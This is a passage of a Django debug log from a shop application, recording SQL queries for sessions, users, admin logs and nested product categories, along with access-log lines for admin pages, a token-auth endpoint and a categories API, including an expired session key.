31585 139762228295424 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:20:44.330268+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 27, 7, 20, 44, 330268, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-27 07:20:44,347 utils 31585 139762228295424 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:20:44,450 utils 31585 139762228295424 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 07:20:44,465 utils 31585 139762228295424 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:20:44.463033+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 20, 44, 463033, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [27/Dec/2019 07:20:44] "GET / HTTP/1.0" 200 8208 [27/Dec/2019 07:20:44] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [27/Dec/2019 07:20:45] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [27/Dec/2019 07:20:45] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [27/Dec/2019 07:20:45] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [27/Dec/2019 07:20:45] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [27/Dec/2019 07:20:45] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [27/Dec/2019 07:20:45] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [27/Dec/2019 07:20:45] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [27/Dec/2019 07:20:45] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 DEBUG 2019-12-27 07:21:59,481 utils 31585 139762214569728 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T07:21:59.466007+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 27, 7, 21, 59, 466007, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-27 07:21:59,485 utils 31585 139762214569728 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-27 07:21:59,541 utils 31585 139762214569728 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-27 07:21:59,555 utils 31585 139762214569728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T07:21:59.553169+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 7, 21, 59, 553169, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [27/Dec/2019 07:21:59] "GET / HTTP/1.0" 200 8208 [27/Dec/2019 07:22:49] "GET /api-token-auth HTTP/1.0" 301 0 DEBUG 2019-12-27 07:22:49,750 utils 31585 139762214569728 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) Not Found: /api-token-auth/ [27/Dec/2019 07:22:49] "GET /api-token-auth/ HTTP/1.0" 404 1747 [27/Dec/2019 07:23:12] "GET / HTTP/1.0" 302 0 Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 07:25:06] "POST /api-token-auth/ HTTP/1.0" 403 2868 DEBUG 2019-12-27 07:25:44,305 utils 31585 139762214569728 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:25:44,313 utils 31585 139762214569728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:25:44,316 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:25:44,319 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:25:44,322 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:25:44,324 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:25:44,327 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:25:44,329 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:25:44,331 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:25:44,334 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:25:44,337 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:25:44,339 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:25:44,341 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:25:44,344 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:25:44,347 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:25:44,349 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:25:44,352 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:25:44,354 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:25:44,356 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:25:44,360 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:25:44,362 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:25:44,364 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:25:44,366 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:25:44,368 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:25:44,371 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:25:44,374 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:25:44,376 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:25:44,378 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:25:44,380 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:25:44,383 utils 31585 139762214569728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:25:44,386 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:25:44,388 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:25:44,391 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:25:44,393 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:25:44,395 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:25:44,399 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:25:44,401 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:25:44,403 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:25:44,407 utils 31585 139762214569728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:25:44,410 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:25:44,414 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:25:44,417 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:25:44,419 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:25:44,421 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:25:44,424 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:25:44,427 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:25:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:25:45,113 utils 31585 139762214569728 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:25:45,120 utils 31585 139762214569728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:25:45,123 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:25:45,126 utils 